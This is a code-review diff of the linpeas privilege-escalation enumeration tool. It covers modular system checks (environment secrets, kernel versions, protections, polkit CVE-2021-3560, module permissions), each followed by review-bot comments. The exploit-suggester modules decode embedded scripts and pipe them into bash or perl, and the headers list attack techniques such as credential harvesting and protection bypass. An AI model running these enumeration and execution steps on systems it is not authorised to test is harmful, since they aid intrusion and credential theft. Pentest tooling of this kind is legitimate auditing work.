parser.add_argument('--small', action='store_true', help='Build small version of linpeas.')
parser.add_argument('--include', type=str, help='Build linpeas only with the modules indicated you can indicate section names or module IDs).')
parser.add_argument('--exclude', type=str, help='Exclude the given modules (you can indicate section names or module IDs).')
parser.add_argument('--output', required=True, type=str, help='Path to write the final linpeas file to.')
args = parser.parse_args()
all_modules = args.all
all_no_fat_modules = args.all_no_fat
no_network_scanning = args.no_network_scanning
small = args.small
include_modules = args.include.split(",") if args.include else []
include_modules = [m.strip().lower() for m in include_modules]
exclude_modules = args.exclude.split(",") if args.exclude else []
exclude_modules = [m.strip().lower() for m in exclude_modules]
output = args.output
# If not all, all-no-fat, small or include, exit
if not args.all and not args.all_no_fat and not args.small and not args.include:
print("You must specify one of the following options: --all, --all-no-fat, --small or --include")
parser.print_help()
exit(1)
main(all_modules, all_no_fat_modules, no_network_scanning, small, include_modules, exclude_modules, output)
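Review bot: the validation at L1884 rejects a run that passes only `--exclude`, although `--exclude` is shown on its own in the builder README (L1803); either accept `--exclude` as implying `--all-no-fat` or make the help text at L1871 say it must be combined with one of the others. Further points: `os.remove(TEMPORARY_LINPEAS_BASE_PATH)` (L1858) is not in a `try/finally`, so an exception during `lbuilder.build()` leaves the temp file behind; `exit(1)` at L1887 should be `sys.exit(1)`; include and exclude names are lowercased at L1879 and L1881, so the matching side must lowercase module paths as well or mixed-case IDs such as `CPU_info` never match; and `FINAL_FAT_LINPEAS_PATH` / `FINAL_LINPEAS_PATH` imported at L1843 are no longer used. Typos: "Build you own" in the parser description (L1865), and the `--include` help text (L1870) has an unbalanced ")".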


@ -0,0 +1,20 @@
# Title: API Keys Regex - Regexes
# ID: RX_regexes
# Author: Carlos Polop
# Last Update: 22-08-2023
# Description: Regexes
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, search_for_regex
# Global Variables: $REGEXES, $TIMEOUT
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 0
if [ "$REGEXES" ] && [ "$TIMEOUT" ]; then
peass{REGEXES}
else
echo "Regexes to search for API keys aren't activated, use param '-r' "
fi
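Review bot: the guard at L1906 requires both `$REGEXES` and `$TIMEOUT`, but the message at L1909 only tells the user to pass `-r`; if `$TIMEOUT` can legitimately be empty, either drop it from the condition or mention it in the message, otherwise a user who did pass `-r` gets a misleading hint. The metadata lists `print_2title` and `search_for_regex` as used functions (L1900) while the visible body calls neither; if they are only referenced inside the `peass{REGEXES}` expansion, a comment saying so will stop the next contributor from "fixing" the list and breaking the build check described in the builder README.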


@ -1,101 +0,0 @@
###########################################
#-------------) System Info (-------------#
###########################################
#-- SY) OS
print_2title "Operative system"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploits"
(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel7,${SED_RED_YELLOW}," | sed -${E} "s,$kernelB,${SED_RED},"
warn_exec lsb_release -a 2>/dev/null
if [ "$MACPEAS" ]; then
warn_exec system_profiler SPSoftwareDataType
fi
echo ""
#-- SY) Sudo
print_2title "Sudo version"
if [ "$(command -v sudo 2>/dev/null)" ]; then
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-version"
sudo -V 2>/dev/null | grep "Sudo ver" | sed -${E} "s,$sudovB,${SED_RED},"
else echo_not_found "sudo"
fi
echo ""
#--SY) USBCreator
if (busctl list 2>/dev/null | grep -q com.ubuntu.USBCreator) || [ "$DEBUG" ]; then
print_2title "USBCreator"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/d-bus-enumeration-and-command-injection-privilege-escalation"
pc_version=$(dpkg -l 2>/dev/null | grep policykit-desktop-privileges | grep -oP "[0-9][0-9a-zA-Z\.]+")
if [ -z "$pc_version" ]; then
pc_version=$(apt-cache policy policykit-desktop-privileges 2>/dev/null | grep -oP "\*\*\*.*" | cut -d" " -f2)
fi
if [ -n "$pc_version" ]; then
pc_length=${#pc_version}
pc_major=$(echo "$pc_version" | cut -d. -f1)
pc_minor=$(echo "$pc_version" | cut -d. -f2)
if [ "$pc_length" -eq 4 ] && [ "$pc_major" -eq 0 ] && [ "$pc_minor" -lt 21 ]; then
echo "Vulnerable!!" | sed -${E} "s,.*,${SED_RED},"
fi
fi
fi
echo ""
#-- SY) PATH
print_2title "PATH"
print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#writable-path-abuses"
if ! [ "$IAMROOT" ]; then
echo "$OLDPATH" 2>/dev/null | sed -${E} "s,$Wfolders|\./|\.:|:\.,${SED_RED_YELLOW},g"
fi
if [ "$DEBUG" ]; then
echo "New path exported: $PATH"
fi
echo ""
#-- SY) Date
print_2title "Date & uptime"
warn_exec date 2>/dev/null
warn_exec uptime 2>/dev/null
echo ""
#-- SY) System stats
if [ "$EXTRA_CHECKS" ]; then
print_2title "System stats"
(df -h || lsblk) 2>/dev/null || echo_not_found "df and lsblk"
warn_exec free 2>/dev/null
echo ""
fi
#-- SY) CPU info
if [ "$EXTRA_CHECKS" ]; then
print_2title "CPU info"
warn_exec lscpu 2>/dev/null
echo ""
fi
if [ -d "/dev" ] || [ "$DEBUG" ] ; then
print_2title "Any sd*/disk* disk in /dev? (limit 20)"
ls /dev 2>/dev/null | grep -Ei "^sd|^disk" | sed "s,crypt,${SED_RED}," | head -n 20
echo ""
fi
if [ -f "/etc/fstab" ] || [ "$DEBUG" ]; then
print_2title "Unmounted file-system?"
print_info "Check if you can mount umounted devices"
grep -v "^#" /etc/fstab 2>/dev/null | grep -Ev "\W+\#|^#" | sed -${E} "s,$mountG,${SED_GREEN},g" | sed -${E} "s,$notmounted,${SED_RED},g" | sed -${E} "s%$mounted%${SED_BLUE}%g" | sed -${E} "s,$Wfolders,${SED_RED}," | sed -${E} "s,$mountpermsB,${SED_RED},g" | sed -${E} "s,$mountpermsG,${SED_GREEN},g"
echo ""
fi
if ([ "$(command -v diskutil)" ] || [ "$DEBUG" ]) && [ "$EXTRA_CHECKS" ]; then
print_2title "Mounted disks information"
warn_exec diskutil list
echo ""
fi
if [ "$(command -v smbutil)" ] || [ "$DEBUG" ]; then
print_2title "Mounted SMB Shares"
warn_exec smbutil statshares -a
echo ""
fi
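Review bot: this deletion takes out the USBCreator test on the policykit-desktop-privileges version (L1935-L1951), the writable-PATH check (L1953-L1961), date/uptime, system stats, CPU info, the /dev disk listing, the fstab colouring (L1986-L1991), diskutil and smbutil, together with the OS and sudo version checks; only Environment, Dmesg, MacOS kext and exploit-suggester modules are visible as replacements in this compare and one file diff is suppressed, so confirm that every removed block has a module counterpart, in particular the USBCreator and fstab checks, which have no obvious successor here.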


@ -0,0 +1,39 @@
# Title: System Information - Environment
# ID: SY_Environment
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Check for sensitive information in environment variables that could lead to privilege escalation:
# - Credentials in environment variables
# - API keys and tokens
# - Sensitive configuration data
# - Common vulnerable scenarios:
# * Hardcoded credentials in environment
# * API keys exposed in environment
# * Database credentials in environment
# * Service account tokens
# - Exploitation methods:
# * Credential harvesting: Extract sensitive data from environment
# * Common attack vectors:
# - Password/credential extraction
# - API key abuse
# - Token theft
# - Configuration data leakage
# * Exploit techniques:
# - Environment variable dumping
# - Credential reuse
# - Token reuse
# - Configuration abuse
# License: GNU GPL
# Version: 1.0
# Functions Used: echo_not_found, print_2title, print_info
# Global Variables: $NoEnvVars, $EnvVarsRed
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 1
print_2title "Environment"
print_info "Any private information inside environment variables?"
(env || printenv || set) 2>/dev/null | grep -Eiv "$NoEnvVars" | sed -${E} "s,$EnvVarsRed,${SED_RED},g" || echo_not_found "env || set"
echo ""
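Review bot: if `$NoEnvVars` is empty, `grep -Eiv "$NoEnvVars"` at L2041 inverts an empty pattern that matches every line, so the whole environment is filtered out and the check prints nothing; either guarantee the variable is non-empty in the core or fall back to an unfiltered listing when it is unset. The Description block (L2010-L2030) is mostly generic bullet text ("Exploit techniques: Configuration abuse") that does not describe this check; two lines saying it dumps `env` and colours matches of `$EnvVarsRed` would help a contributor more.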


@ -0,0 +1,37 @@
# Title: System Information - Dmesg
# ID: SY_Dmesg
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Check for kernel signature verification failures that could lead to privilege escalation:
# - Failed kernel module signature verifications
# - Common vulnerable scenarios:
# * Disabled kernel module signing
# * Failed signature verifications
# * Unsigned kernel modules
# - Exploitation methods:
# * Kernel module injection: Load malicious kernel modules
# * Common attack vectors:
# - Kernel module loading
# - Kernel module replacement
# - Kernel module modification
# * Exploit techniques:
# - Module signing bypass
# - Kernel module injection
# - Kernel module modification
# - Kernel module replacement
# License: GNU GPL
# Version: 1.0
# Functions Used: echo_not_found, print_2title, print_info
# Global Variables: $DEBUG
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 0
if [ "$(command -v dmesg 2>/dev/null || echo -n '')" ] || [ "$DEBUG" ]; then
print_2title "Searching Signature verification failed in dmesg"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#dmesg-signature-verification-failed"
(dmesg 2>/dev/null | grep "signature") || echo_not_found "dmesg"
echo ""
fi
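Review bot: `grep "signature"` at L2079 is case-sensitive and matches any line containing that word, not only "Signature verification failed" as the title at L2077 and the linked section promise; `grep -i "signature verification failed"` or at least `grep -i signature` would be closer. On hosts with `kernel.dmesg_restrict=1` an unprivileged `dmesg` fails and the fallback reports "dmesg" not found, which is misleading; a distinct message for the restricted case would help. As with the other new modules, the Description (L2052-L2067) is boilerplate rather than a description of this check.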


@ -0,0 +1,52 @@
# Title: System Information - MacOS OS checks
# ID: SY_Macos_os_checks
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Check for MacOS-specific vulnerabilities and misconfigurations that could lead to privilege escalation:
# - Unsigned kernel extensions
# - Non-Apple kernel extensions
# - System Integrity Protection (SIP) status
# - Gatekeeper status
# - Common vulnerable scenarios:
# * Disabled SIP
# * Unsigned kernel extensions
# * Third-party kernel extensions
# * Disabled Gatekeeper
# - Exploitation methods:
# * Kernel extension injection: Load malicious kernel extensions
# * Common attack vectors:
# - SIP bypass
# - Kernel extension loading
# - Gatekeeper bypass
# - System modification
# * Exploit techniques:
# - Kernel extension injection
# - SIP bypass
# - Gatekeeper bypass
# - System modification
# License: GNU GPL
# Version: 1.0
# Functions Used:macosNotSigned, print_2title
# Global Variables: $MACPEAS
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 0
if [ "$MACPEAS" ]; then
print_2title "Kernel Extensions not belonging to apple"
kextstat 2>/dev/null | grep -Ev " com.apple."
echo ""
print_2title "Unsigned Kernel Extensions"
macosNotSigned /Library/Extensions
macosNotSigned /System/Library/Extensions
echo ""
fi
if [ "$MACPEAS" ] && [ "$(command -v brew 2>/dev/null || echo -n '')" ]; then
print_2title "Brew Doctor Suggestions"
brew doctor
echo ""
fi
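Review bot: the `Functions Used:macosNotSigned, print_2title` header line has no space after the colon, unlike every other module header in this series; if the builder splits on `: ` it will not pick up `macosNotSigned` and the module would call an undefined function. The Description also promises SIP and Gatekeeper status checks, but the body only lists non-Apple and unsigned kexts and runs `brew doctor` (those two checks live in SY_Protections), so trim the header to what this module does. Minor: `grep -Ev " com.apple."` uses unescaped dots; `grep -Ev " com\.apple\."` is what is meant.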

@ -0,0 +1,39 @@
# Title: System Information - Linux Exploit Suggester
# ID: SY_Linux_exploit_suggester
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Execute Linux Exploit Suggester to identify potential kernel exploits:
# - Automated kernel vulnerability detection
# - Common vulnerable scenarios:
# * Known kernel vulnerabilities
# * Unpatched kernel versions
# * Missing security patches
# - Exploitation methods:
# * Kernel exploit execution: Use suggested exploits
# * Common attack vectors:
# - Kernel memory corruption
# - Race conditions
# - Use-after-free
# - Integer overflow
# * Exploit techniques:
# - Kernel memory manipulation
# - Privilege escalation
# - Root access acquisition
# - System compromise
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_info
# Global Variables: $MACPEAS
# Initial Functions:
# Generated Global Variables: $les_b64
# Fat linpeas: 0
# Small linpeas: 1
if [ "$(command -v bash 2>/dev/null || echo -n '')" ] && ! [ "$MACPEAS" ]; then
print_2title "Executing Linux Exploit Suggester"
print_info "https://github.com/mzet-/linux-exploit-suggester"
les_b64="peass{https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh}"
echo $les_b64 | base64 -d | bash | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -i "\[CVE" -A 10 | grep -Ev "^\-\-$" | sed -${E} "s/\[(CVE-[0-9]+-[0-9]+,?)+\].*/${SED_RED}/g"
echo ""
fi
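Review bot: `echo $les_b64 | base64 -d | bash` leaves `$les_b64` unquoted and does not redirect the stderr of `bash`, so any diagnostics the suggester writes to stderr interleave with the filtered CVE output; the perl variant in the next module uses `perl 2>/dev/null`, so `echo "$les_b64" | base64 -d | bash 2>/dev/null | ...` would match it. The Description header also lists use-after-free, integer overflow and "system compromise" as exploit techniques of this module, whereas the body only runs the suggester and greps `[CVE` lines; the header should describe the check, not the class of bugs the external tool reports.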

@ -0,0 +1,41 @@
# Title: System Information - Linux Exploit Suggester 2
# ID: SY_Linux_exploit_suggester_2
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Execute Linux Exploit Suggester 2 (Perl version) to identify potential kernel exploits:
# - Alternative kernel vulnerability detection
# - Perl-based exploit suggestions
# - Common vulnerable scenarios:
# * Known kernel vulnerabilities
# * Unpatched kernel versions
# * Missing security patches
# * Alternative exploit paths
# - Exploitation methods:
# * Kernel exploit execution: Use suggested exploits
# * Common attack vectors:
# - Kernel memory corruption
# - Race conditions
# - Use-after-free
# - Integer overflow
# * Exploit techniques:
# - Kernel memory manipulation
# - Privilege escalation
# - Root access acquisition
# - System compromise
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_info
# Global Variables:
# Initial Functions:
# Generated Global Variables: $les2_b64
# Fat linpeas: 1
# Small linpeas: 0
if [ "$(command -v perl 2>/dev/null || echo -n '')" ] && ! [ "$MACPEAS" ]; then
print_2title "Executing Linux Exploit Suggester 2"
print_info "https://github.com/jondonas/linux-exploit-suggester-2"
les2_b64="peass{https://raw.githubusercontent.com/jondonas/linux-exploit-suggester-2/master/linux-exploit-suggester-2.pl}"
echo $les2_b64 | base64 -d | perl 2>/dev/null | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g" | grep -iE "CVE" -B 1 -A 10 | grep -Ev "^\-\-$" | sed -${E} "s,CVE-[0-9]+-[0-9]+,${SED_RED},g"
echo ""
fi
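Review bot: the `Global Variables:` header is empty although the guard on the `if` line reads `$MACPEAS`; the sibling Linux Exploit Suggester module declares `# Global Variables: $MACPEAS` for the same condition, so this one should too. Also `grep -iE "CVE" -B 1 -A 10` is looser than the first module's `grep -i "\[CVE"`: it pulls in any line mentioning "cve" in prose, so consider matching the bracketed form consistently.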

@ -0,0 +1,39 @@
# Title: System Information - CVE_2021_3560
# ID: SY_CVE_2021_3560
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Check for Polkit vulnerability (CVE-2021-3560) that could lead to privilege escalation:
# - Vulnerable Polkit versions:
# * polkit 0.105-26 (Ubuntu)
# * polkit 0.117-2 (RHEL)
# * polkit 0.115-6 (RHEL)
# - Common vulnerable scenarios:
# * Unpatched Polkit versions
# * Default Polkit configurations
# - Exploitation methods:
# * Race condition in Polkit authentication
# * Common attack vectors:
# - Authentication bypass
# - Privilege escalation
# - Root access acquisition
# * Exploit techniques:
# - Race condition exploitation
# - Authentication bypass
# - Privilege escalation
# - System compromise
# License: GNU GPL
# Version: 1.0
# Functions Used:
# Global Variables:
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 0
if apt list --installed 2>/dev/null | grep -q 'polkit.*0\.105-26' || \
yum list installed 2>/dev/null | grep -q 'polkit.*\(0\.117-2\|0\.115-6\)' || \
rpm -qa 2>/dev/null | grep -q 'polkit.*\(0\.117-2\|0\.115-6\)'; then
echo "Vulnerable to CVE-2021-3560" | sed -${E} "s,.*,${SED_RED_YELLOW},"
echo ""
fi
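Review bot: this check prints its red `Vulnerable to CVE-2021-3560` line without any `print_2title`/`print_info` in front of it (the `Functions Used:` header is empty), so a hit appears as an unlabelled line under whichever section ran before it; add a title and a link like the other modules. The version patterns are also prefix matches: `polkit.*0\.105-26` matches any package whose version string merely starts with `0.105-26`, so a later rebuild of the form `0.105-26ubuntu1.x` is flagged too. Anchor the match (for instance `0\.105-26([^0-9a-z]|$)`) or compare the exact version to avoid false positives on patched builds.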

@ -0,0 +1,139 @@
# Title: System Information - Protections
# ID: SY_Protections
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Check for system security protections and their bypass possibilities:
# - AppArmor/SELinux status and profiles
# - ASLR status
# - Seccomp filters
# - Capabilities
# - Common vulnerable scenarios:
# * Disabled security modules
# * Weak security profiles
# * Missing security features
# * Misconfigured protections
# - Exploitation methods:
# * Protection bypass: Circumvent security measures
# * Common attack vectors:
# - AppArmor/SELinux bypass
# - ASLR bypass
# - Seccomp filter bypass
# - Capability abuse
# * Exploit techniques:
# - Profile bypass
# - Memory randomization bypass
# - Filter bypass
# - Capability exploitation
# - Protection circumvention
# License: GNU GPL
# Version: 1.0
# Functions Used: echo_not_found, print_2title, print_list, warn_exec
# Global Variables:
# Initial Functions:
# Generated Global Variables: $ASLR, $hypervisorflag, $detectedvirt
# Fat linpeas: 0
# Small linpeas: 0
#-- SY) AppArmor
print_2title "Protections"
print_list "AppArmor enabled? .............. "$NC
if [ "$(command -v aa-status 2>/dev/null || echo -n '')" ]; then
aa-status 2>&1 | sed "s,disabled,${SED_RED},"
elif [ "$(command -v apparmor_status 2>/dev/null || echo -n '')" ]; then
apparmor_status 2>&1 | sed "s,disabled,${SED_RED},"
elif [ "$(ls -d /etc/apparmor* 2>/dev/null)" ]; then
ls -d /etc/apparmor*
else
echo_not_found "AppArmor"
fi
#-- SY) AppArmor2
print_list "AppArmor profile? .............. "$NC
(cat /proc/self/attr/current 2>/dev/null || echo "unconfined") | sed "s,unconfined,${SED_RED}," | sed "s,kernel,${SED_GREEN},"
#-- SY) LinuxONE
print_list "is linuxONE? ................... "$NC
( (uname -a | grep "s390x" >/dev/null 2>&1) && echo "Yes" || echo_not_found "s390x")
#-- SY) grsecurity
print_list "grsecurity present? ............ "$NC
( (uname -r | grep "\-grsec" >/dev/null 2>&1 || grep "grsecurity" /etc/sysctl.conf >/dev/null 2>&1) && echo "Yes" || echo_not_found "grsecurity")
#-- SY) PaX
print_list "PaX bins present? .............. "$NC
(command -v paxctl-ng paxctl >/dev/null 2>&1 && echo "Yes" || echo_not_found "PaX")
#-- SY) Execshield
print_list "Execshield enabled? ............ "$NC
(grep "exec-shield" /etc/sysctl.conf 2>/dev/null || echo_not_found "Execshield") | sed "s,=0,${SED_RED},"
#-- SY) SElinux
print_list "SELinux enabled? ............... "$NC
(sestatus 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
#-- SY) Seccomp
print_list "Seccomp enabled? ............... "$NC
([ "$(grep Seccomp /proc/self/status 2>/dev/null | grep -v 0)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
#-- SY) AppArmor
print_list "User namespace? ................ "$NC
if [ "$(cat /proc/self/uid_map 2>/dev/null)" ]; then echo "enabled" | sed "s,enabled,${SED_GREEN},"; else echo "disabled" | sed "s,disabled,${SED_RED},"; fi
#-- SY) cgroup2
print_list "Cgroup2 enabled? ............... "$NC
([ "$(grep cgroup2 /proc/filesystems 2>/dev/null)" ] && echo "enabled" || echo "disabled") | sed "s,disabled,${SED_RED}," | sed "s,enabled,${SED_GREEN},"
#-- SY) Gatekeeper
if [ "$MACPEAS" ]; then
print_list "Gatekeeper enabled? .......... "$NC
(spctl --status 2>/dev/null || echo_not_found "sestatus") | sed "s,disabled,${SED_RED},"
print_list "sleepimage encrypted? ........ "$NC
(sysctl vm.swapusage | grep "encrypted" | sed "s,encrypted,${SED_GREEN},") || echo_no
print_list "XProtect? .................... "$NC
(system_profiler SPInstallHistoryDataType 2>/dev/null | grep -A 4 "XProtectPlistConfigData" | tail -n 5 | grep -Iv "^$") || echo_no
print_list "SIP enabled? ................. "$NC
csrutil status | sed "s,enabled,${SED_GREEN}," | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no
print_list "Sealed Snapshot? ............. "$NC
diskutil apfs list | grep "Snapshot Sealed" | awk -F: '{print $2}' | tr -d '[:space:]' | sed "s,Yes,${SED_GREEN}," | sed "s,No,${SED_RED}," || echo_not_found
print_list "Sealed Snapshot (2nd)? ....... "$NC
csrutil authenticated-root status | sed "s,enabled,${SED_GREEN}," | sed "s,disabled,${SED_RED}," || echo_no
print_list "Connected to JAMF? ........... "$NC
warn_exec jamf checkJSSConnection
print_list "Connected to AD? ............. "$NC
dsconfigad -show && echo "" || echo_no
fi
#-- SY) ASLR
print_list "Is ASLR enabled? ............... "$NC
ASLR=$(cat /proc/sys/kernel/randomize_va_space 2>/dev/null)
if [ -z "$ASLR" ]; then
echo_not_found "/proc/sys/kernel/randomize_va_space";
else
if [ "$ASLR" -eq "0" ]; then printf $RED"No"$NC; else printf $GREEN"Yes"$NC; fi
echo ""
fi
#-- SY) Printer
print_list "Printer? ....................... "$NC
(lpstat -a || system_profiler SPPrintersDataType || echo_no) 2>/dev/null
#-- SY) Running in a virtual environment
print_list "Is this a virtual machine? ..... "$NC
hypervisorflag=$(grep flags /proc/cpuinfo 2>/dev/null | grep hypervisor)
if [ "$(command -v systemd-detect-virt 2>/dev/null || echo -n '')" ]; then
detectedvirt=$(systemd-detect-virt)
if [ "$hypervisorflag" ]; then printf $RED"Yes ($detectedvirt)"$NC; else printf $GREEN"No"$NC; fi
else
if [ "$hypervisorflag" ]; then printf $RED"Yes"$NC; else printf $GREEN"No"$NC; fi
fi
echo ""
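Review bot: the Gatekeeper line reports `echo_not_found "sestatus"` when `spctl` is missing (copied from the SELinux check above); it should be `echo_not_found "spctl"`. In the same macOS block the SIP line applies `sed "s,enabled,${SED_GREEN},"` twice, and `sysctl vm.swapusage` on the sleepimage line has no `2>/dev/null`, so it prints an error instead of falling through to `echo_no` cleanly. Outside that block, the `#-- SY) AppArmor` comment above the `User namespace?` check is mislabelled and should read `#-- SY) User namespace`.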

@ -0,0 +1,62 @@
# Title: System Information - Kernel Modules
# ID: SY_Kernel_Modules
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Check for kernel module vulnerabilities and misconfigurations that could lead to privilege escalation:
# - Loaded kernel modules with known vulnerabilities
# - Kernel modules with weak permissions that could be modified
# - Ability to load kernel modules as unprivileged user
# - Missing kernel module signing requirements
# - Exploitation methods:
# * Vulnerable modules: Use known exploits for vulnerable kernel modules
# * Weak permissions: Modify kernel modules to inject malicious code
# * Module loading: Load malicious kernel modules to get root access
# * Common vulnerable modules: nf_tables, eBPF, overlayfs, etc.
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_3title
# Global Variables:
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 1
echo ""
print_2title "Kernel Modules Information"
# List loaded kernel modules
if [ "$EXTRA_CHECKS" ] || [ "$DEBUG" ]; then
print_3title "Loaded kernel modules"
if [ -f "/proc/modules" ]; then
lsmod
else
echo_not_found "/proc/modules"
fi
fi
# Check for kernel modules with weak permissions
print_3title "Kernel modules with weak perms?"
if [ -d "/lib/modules" ]; then
find /lib/modules -type f -name "*.ko" -ls 2>/dev/null | grep -Ev "root\s+root" | sed -${E} "s,.*,${SED_RED},g"
if [ $? -eq 1 ]; then
echo "No kernel modules with weak permissions found"
fi
else
echo_not_found "/lib/modules"
fi
echo ""
# Check for kernel modules that can be loaded by unprivileged users
print_3title "Kernel modules loadable? "
if [ -f "/proc/sys/kernel/modules_disabled" ]; then
if [ "$(cat /proc/sys/kernel/modules_disabled)" = "0" ]; then
echo "Modules can be loaded" | sed -${E} "s,.*,${SED_RED},g"
else
echo "Modules cannot be loaded" | sed -${E} "s,.*,${SED_GREEN},g"
fi
else
echo_not_found "/proc/sys/kernel/modules_disabled"
fi
echo ""
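Review bot: the `if [ $? -eq 1 ]` after the `find ... | grep -Ev "root\s+root" | sed ...` pipeline tests the exit status of `sed`, not of `grep`, and sed exits 0 whenever it runs, so the `No kernel modules with weak permissions found` message is never printed. Either capture the pipeline into a variable and test `[ -z "$out" ]`, or make grep the last command. Separately, `grep -Ev "root\s+root"` only flags modules not owned by root:root; a root-owned module that is group- or world-writable passes through unflagged, so the filter should also look at the permission bits (e.g. `find /lib/modules -type f -name "*.ko" -perm /022`). `echo_not_found` is also used here but missing from `Functions Used:`.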

@ -0,0 +1,42 @@
# Title: System Information - Operative System
# ID: SY_Operative_system
# Author: Carlos Polop
# Last Update: 07-03-2024
# Description: Check for operating system information relevant to privilege escalation:
# - OS version and distribution
# - Kernel version
# - Architecture
# - Common vulnerable scenarios:
# * Outdated OS versions
# * Unpatched systems
# * Known vulnerable distributions
# * Architecture-specific vulnerabilities
# - Exploitation methods:
# * Version-specific exploits: Use known exploits for the OS version
# * Common attack vectors:
# - OS version exploits
# - Distribution-specific vulnerabilities
# - Architecture-specific exploits
# - Kernel version exploits
# * Exploit techniques:
# - Version-specific payloads
# - Distribution-specific attacks
# - Architecture-specific techniques
# - Kernel exploitation
# License: GNU GPL
# Version: 1.0
# Functions Used: print_2title, print_info, warn_exec
# Global Variables: $MACPEAS, $kernelDCW_Ubuntu_Precise_1, $kernelB, $kernelDCW_Ubuntu_Precise_2, $kernelDCW_Ubuntu_Precise_3, $kernelDCW_Ubuntu_Precise_4, $kernelDCW_Ubuntu_Precise_5, $kernelDCW_Ubuntu_Precise_6, $kernelDCW_Rhel5_1, $kernelDCW_Rhel5_2, $kernelDCW_Rhel5_3, $kernelDCW_Rhel6_1, $kernelDCW_Rhel6_2, $kernelDCW_Rhel6_3, $kernelDCW_Rhel6_4, $kernelDCW_Rhel7, $kernelDCW_Ubuntu_Trusty_1, $kernelDCW_Ubuntu_Trusty_2, $kernelDCW_Ubuntu_Trusty_3, $kernelDCW_Ubuntu_Trusty_4, $kernelDCW_Ubuntu_Xenial
# Initial Functions:
# Generated Global Variables:
# Fat linpeas: 0
# Small linpeas: 1
print_2title "Operative system"
print_info "https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#kernel-exploits"
(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel5_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Rhel6_4,${SED_RED_YELLOW}," | sed -${E} 